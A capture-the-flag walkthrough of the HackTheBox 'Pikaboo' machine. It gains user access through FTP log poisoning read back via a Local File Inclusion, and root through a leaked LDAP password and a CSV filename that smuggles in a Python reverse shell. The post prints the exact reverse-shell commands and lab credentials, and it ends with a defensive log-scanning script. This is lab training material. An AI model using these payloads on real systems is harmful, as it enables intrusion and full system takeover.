In this post, I would like to share a walkthrough of the Pikaboo machine from HackTheBox.

This machine is rated Hard.

Source: HackTheBox

What will you gain from the Pikaboo machine?

For the user flag, you need to locate a Local File Inclusion vulnerability on the website, which, combined with the FTP service, gives you user-level access.

As for the root flag, you need to dig deeper within the machine, especially the LDAP service, where you will find a username and password for FTP access.

Information Gathering

Once the VPN connection is up (the connection pack is downloaded from HackTheBox), we can start information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

From the results, we need to make the machine's domain name “pikaboo.htb” resolve locally.

Let’s open the browser and go straight to the website interface.

Surprisingly, nothing of interest is found on the website.

From the server-status web interface, we notice a few directories that are worth investigating.

Finally, we can easily access the directory /admin../admin_staging, which directs us to a dashboard.

Looking at the website URL, I’m fairly sure that the website has a Local File Inclusion vulnerability.

After roaming the directories on the website, I managed to find /var/log/vsftpd.log. We can see FTP log entries in that file.

Gaining User Access

First, an nc listener should be running on our terminal to catch the reverse shell connection back to us.

We can use the PHP reverse shell from the cheat sheet I have written here.

We need to run ftp pikaboo.htb on the terminal and enter the PHP reverse shell as our username, so that it is written into the FTP log.

To trigger the reverse shell connection, we need to refresh (re-include) /var/log/vsftpd.log through the LFI.

Voila! Checking the nc listener terminal, we see the reverse shell connection back to us.

We can check which user we are running as on the machine.

We can read the user flag by executing the “cat user.txt” command.

Escalate to Root Privileges

Sadly, we didn’t find anything useful from SUID binaries or the “sudo -l” command.

From my experience, we can inspect the crontab to see which commands run regularly, especially with root privileges.

After fully analyzing the crontab file, I notice that /usr/local/bin/csvupdate_cron runs with root privileges.

Analyzing the content of the csvupdate_cron file, we notice that the way it handles CSV files can be abused.

While roaming inside the server, I notice a configuration file (/opt/pokeapi/config/settings.php) that looks like the one shown above.

We have obtained the LDAP bind password from that file, and it might lead us to FTP credentials by running the following command:

ldapsearch -x -LLL -h -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w J~42%W?PFHl]g -b 'dc=ftp,dc=pikaboo,dc=htb' -s sub '(objectClass=*)'

The output of the command above contains a base64-encoded password, which we need to decode.

The decoded credentials are shown below:

Username: pwnmeow
Password: _G0tT4_C4tcH'3m_4lL!_

We create a local file (with the touch command) whose name is as below:

touch pikaboo "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"IP ADDRESS\",PORT));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")'; .csv"

We then access the machine via the FTP service using the credentials found earlier.

Once successfully logged in via FTP, we change into any subdirectory on the FTP service.

Finally, we upload the reverse shell file as follows:

put  pikaboo "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"IP ADDRESS\",PORT));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")'; .csv"

### We need to start our NC listener before running the command above ###

Based on the crontab configuration, it takes around 1 minute for the reverse shell connection to come back to us.

We now have root privileges.

We can read the root flag by executing the command “cat root.txt” and submit the flag on the HackTheBox website.
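As an added defensive example (not part of the original write-up), the following Python script scans vsftpd-style log lines for the two indicators this box relies on: PHP tags in FTP usernames (log poisoning that is later reached through the LFI) and shell metacharacters in uploaded filenames (the hostile CSV name the root cron job picks up). The log line shape and the sample lines are constructed to approximate vsftpd output and are not taken from the machine.

```python
import re
from dataclasses import dataclass

# Constructed sample lines approximating vsftpd's log format (not captured from the box).
SAMPLE_LOG = [
    'Thu Sep  2 10:00:01 2021 [pid 1410] CONNECT: Client "10.10.14.2"',
    'Thu Sep  2 10:00:03 2021 [pid 1409] [ftpuser] FAIL LOGIN: Client "10.10.14.2"',
    'Thu Sep  2 10:00:09 2021 [pid 1409] [<?php system($_GET["c"]); ?>] FAIL LOGIN: Client "10.10.14.2"',
    'Thu Sep  2 10:01:12 2021 [pid 1520] [pwnmeow] OK UPLOAD: Client "10.10.14.2", "/pokemon/pokemon.csv", 48 bytes, 2.11Kbyte/sec',
    'Thu Sep  2 10:01:40 2021 [pid 1520] [pwnmeow] OK UPLOAD: Client "10.10.14.2", "/pokemon/|sleep 5; .csv", 0 bytes, 0.00Kbyte/sec',
]

# Assumed line shape: "<timestamp> [pid N] [<user>] <EVENT>: <details>".
LINE_RE = re.compile(r"^(?P<ts>.+?) \[pid (?P<pid>\d+)\] \[(?P<user>.*?)\] (?P<event>[A-Z ]+?): (?P<rest>.*)$")
# A PHP open tag inside an FTP username only makes sense as a log-poisoning attempt.
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
# Characters that turn a filename into a command once it reaches a shell or a two-argument open().
SHELL_META_RE = re.compile(r"[|;&`$<>]")
UPLOAD_PATH_RE = re.compile(r'Client "[^"]*", "(?P<path>.*?)", ')


@dataclass
class Finding:
    line_no: int
    kind: str
    detail: str


def scan_vsftpd_log(lines):
    """Return one Finding per line that shows either indicator."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # CONNECT lines and unparsable lines carry no user field
        user = m.group("user")
        if PHP_TAG_RE.search(user):
            findings.append(Finding(n, "log-poisoning", f"PHP tag in FTP username {user!r}"))
        if m.group("event") == "OK UPLOAD":
            pm = UPLOAD_PATH_RE.search(m.group("rest"))
            if pm and SHELL_META_RE.search(pm.group("path")):
                findings.append(Finding(n, "hostile-filename", f"shell metacharacter in uploaded path {pm.group('path')!r}"))
    return findings


if __name__ == "__main__":
    for f in scan_vsftpd_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.kind}: {f.detail}")
```

On the sample input the script flags line 3 (poisoned username) and line 5 (hostile upload name) and passes the legitimate login and upload untouched.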

Happy Learning Guys!

Extra Information

The root hash in /etc/shadow can be used to unlock the official write-up.